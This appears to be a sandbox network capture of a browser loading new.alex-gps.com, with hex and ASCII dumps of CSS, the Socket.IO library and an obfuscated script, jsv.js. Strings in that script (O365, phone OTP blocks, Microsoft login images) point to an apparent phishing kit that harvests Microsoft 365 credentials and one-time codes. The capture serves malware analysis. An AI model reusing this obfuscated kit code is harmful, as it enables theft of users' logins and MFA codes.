                                                      2024-10-23 21:29:35 UTC8000INData Raw: 3a 5c 78 32 30 31 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 2d 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 38 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 38 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: :\x201;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x20-2px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20-10px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20width:\x208px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x208px;\x0a\x20\x20\x20\x20\x20\x20\x20\
                                                      2024-10-23 21:29:35 UTC8000INData Raw: 67 3a 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6f 75 74 6c 69 6e 65 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 64 79 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: g:\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-style:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20outline:\x20none;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20body\x20{\x0a\x20\x20\
                                                      2024-10-23 21:29:36 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6f 74 70 45 72 72 6f 72 32 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 23 65 38 31 31 32 33 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: 0\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.otpError2\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#e81123;\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\
                                                      2024-10-23 21:29:36 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7a 2d 69 6e 64 65 78 3a 5c 78 32 30 31 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 68 65 61 64 65 72 5c 78 32 30
                                                      Data Ascii: \x20\x20\x20position:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20z-index:\x201;\x0a\x20\x20\x20\x20\x20\x20\x20\x20top:\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20width:\x20100%;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.header\x20
                                                      2024-10-23 21:29:36 UTC8000INData Raw: 72 6f 6c 6c 65 72 5c 78 32 30 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 38 29 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 35 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 40 6b 65 79 66 72 61 6d 65 73 5c 78 32 30 6c 64 73 2d 72 6f 6c 6c 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: roller\x20div:nth-child(8):after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20top:\x2056px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x2012px;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20@keyframes\x20lds-roller\x20{\x0a\x20\x20\x20\x20\x20\x20\


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.164963718.245.31.784436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:36 UTC566OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                      Host: cdn.socket.io
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://new.alex-gps.com
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:36 UTC702INHTTP/1.1 200 OK
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Content-Length: 49993
                                                      Connection: close
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=31536000, immutable
                                                      Content-Disposition: inline; filename="socket.io.min.js"
                                                      Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                      ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                      X-Cache: Hit from cloudfront
                                                      Via: 1.1 fbd2b51fce9ee4f3aa7b93dbbda3d698.cloudfront.net (CloudFront)
                                                      X-Amz-Cf-Pop: FRA56-P8
                                                      X-Amz-Cf-Id: 4JTyyuJ2xCv1IyMDW57oyJMM68tSb-566TNG2gtuVnQIcksK37rxlg==
                                                      Age: 7426367
                                                      2024-10-23 21:29:36 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                      Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                      2024-10-23 21:29:36 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                      Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                      2024-10-23 21:29:36 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                      Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                      2024-10-23 21:29:36 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                      Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.1649639201.102.105.2364436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC348OUTGET /m/jsv.js HTTP/1.1
                                                      Host: new.alex-gps.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:37 UTC282INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:37 GMT
                                                      Server: Apache/2.4.59 (Debian)
                                                      Last-Modified: Tue, 08 Oct 2024 19:11:56 GMT
                                                      ETag: "1f745-623fbe92bf700"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 128837
                                                      Vary: Accept-Encoding
                                                      Connection: close
                                                      Content-Type: text/javascript
                                                      2024-10-23 21:29:37 UTC7910INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 37 36 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 65 64 39 34 34 20 3d 20 5b 27 68 72 65 66 27 2c 20 27 2e 70 68 6f 6e 65 6f 74 70 54 65 78 74 27 2c 20 27 72 65 61 64 79 53 74 61 74 65 27 2c 20 27 23 70 6c 61 79 6d 65 5f 62 69 67 27 2c 20 27 40 69 6f 6e 6f 73 2e 27 2c 20 27 23 70 6c 61 79 6d 65 27 2c 20 27 72 65 73 69 7a 65 27 2c 20 27 73 32 63 5f 72 65 73 74 61 72 74 27 2c 20 27 2e 6c 6f 61 64 65 72 78 42 6c 6f 63 6b 31 31 27 2c 20 27 73 32 63 27 2c 20 27 63 6f 6d 70 6c 65 74 65 27 2c 20 27 4f 33 36 35 27 2c 20 27 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 62 61 63
                                                      Data Ascii: function _0xb276() { const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/bac
                                                      2024-10-23 21:29:37 UTC8000INData Raw: 32 30 66 61 2d 70 6c 61 79 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 72 6f 74 61 74 65 2d 6c 65 66 74 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61
                                                      Data Ascii: 20fa-play\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa-solid\x20fa-rotate-left\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa
                                                      2024-10-23 21:29:37 UTC8000INData Raw: 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 50 61 73 73 6d 73 61 70 70 42 6c 6f 63 6b 5c 78 32 30 77 33 2d 61 6e 69 6d 61 74 65 2d 72 69 67 68 74 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6d 67 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 4c 6f 67 6f 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f
                                                      Data Ascii: 0\x20<div\x20style=\x22display:\x20none;\x22\x20class=\x22noPassmsappBlock\x20w3-animate-right\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<img\x20class=\x22formLogo\x22\x20src=\x22https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_
                                                      2024-10-23 21:29:37 UTC8000INData Raw: 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c
                                                      Data Ascii: ng\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://l
                                                      2024-10-23 21:29:37 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 42 4f 49 4c 45 52 54 45 58 54 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 67 72 61 79 42 6f 78 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 69 6c 65 72 5c 78 32 30 74 65 78 74 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c
                                                      Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20...\x20BOILERTEXT\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22grayBox\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20boiler\x20text\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20</div>\
                                                      2024-10-23 21:29:38 UTC8000INData Raw: 3a 5c 78 32 30 31 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 2d 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 38 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 38 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: :\x201;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x20-2px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20-10px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20width:\x208px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x208px;\x0a\x20\x20\x20\x20\x20\x20\x20\
                                                      2024-10-23 21:29:38 UTC8000INData Raw: 67 3a 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6f 75 74 6c 69 6e 65 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 64 79 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: g:\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-style:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20outline:\x20none;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20body\x20{\x0a\x20\x20\
                                                      2024-10-23 21:29:38 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6f 74 70 45 72 72 6f 72 32 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 23 65 38 31 31 32 33 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
